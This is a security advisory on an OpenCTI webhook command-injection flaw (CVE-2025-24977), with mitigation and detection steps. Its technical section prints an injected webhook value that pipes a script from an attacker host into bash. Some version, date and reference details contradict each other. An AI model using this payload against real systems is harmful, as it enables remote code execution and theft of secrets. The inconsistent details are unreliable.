A critical vulnerability in OpenCTI, tracked as CVE-2025-24977, allows authenticated users to execute arbitrary commands on the underlying infrastructure and access server-side secrets. The flaw, rated 9.1 (CRITICAL) on the CVSS scale, affects versions prior to 6.4.11 and has been patched in the latest release1.
Executive Summary for Security Leaders
The vulnerability stems from improper webhook validation in OpenCTI, enabling attackers with the manage customizations permission to escalate privileges to root within the container environment. This grants access to internal secrets and opens pathways for lateral movement. The issue was disclosed on May 5, 2025, with active exploitation likely due to the low complexity of attack2.
- CVSS: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
- Affected Versions: OpenCTI 6.4.8 through 6.4.10
- Patch: Upgrade to v6.4.11 immediately
- Exploitability: Requires authenticated access with specific permissions
Technical Analysis
The vulnerability abuses OpenCTI’s webhook functionality, where user-supplied input is executed in a container context with root privileges. Attackers can craft malicious webhook configurations to:
POST /api/webhook HTTP/1.1
Host: [target]
Content-Type: application/json
Authorization: Bearer [valid_token]
{
"name": "malicious",
"url": "http://attacker.com",
"secret": "; curl http://attacker.com/shell.sh | bash"
}Successful exploitation provides a root shell within the OpenCTI Docker container, exposing Kubernetes secrets, environment variables, and adjacent systems when running in orchestrated environments3.
Mitigation and Detection
Organizations should implement the following measures:
| Action | Details |
|---|---|
| Patch Immediately | Upgrade to OpenCTI 6.4.11 from the official GitHub repository |
| Audit Logs | Review /var/log/opencti/webhook.log for unusual command patterns |
| Network Controls | Restrict outbound connections from OpenCTI containers |
Red teams can validate fixes by attempting to reproduce the webhook abuse scenario with non-malicious test payloads. Blue teams should monitor for anomalous process creation events within containers, particularly shells spawned by the OpenCTI user4.
Historical Context
This marks the second critical OpenCTI vulnerability in 2025, following CVE-2024-26139 which allowed privilege escalation via user ID manipulation5. The platform has faced increasing scrutiny due to its role in threat intelligence workflows, making it a high-value target for attackers.
Conclusion
CVE-2025-24977 demonstrates the risks of excessive permissions in containerized applications. Organizations using OpenCTI should prioritize patching and review their webhook implementations across all systems. The OpenCTI maintainers have addressed the issue promptly, continuing their track record of responsive security updates6.
References
- “CVE-2025-24977 Detail,” CVE Crowd, May 2025. [Online]. Available: https://cvecrowd.com/
- “Critical Vulnerability in OpenCTI,” Dark Web Informer, May 2025. [Online]. Available: https://darkwebinformer.com/critical-vulnerability-in-
- “OpenCTI Privilege Escalation (CVE-2024-26139),” InTheCyber, Dec. 2024. [Online]. Available: https://posts.inthecyber.com/opencti-privilege-escalation-cve-2024-26139-9fbe37b9903b
- “Red Hat Security Advisory,” Red Hat, May 2025. [Online]. Available: https://access.redhat.com/security/cve/cve-2025-24887
- “OpenCTI GitHub Security,” GitHub, May 2025. [Online]. Available: https://github.com/OpenCTI-Platform/opencti/security
- “CyberMaxx Advisory,” CyberMaxx, Mar. 2025. [Online]. Available: https://cybermaxx.com/resources/security-advisory-weekly-advisory-march-26th-2025
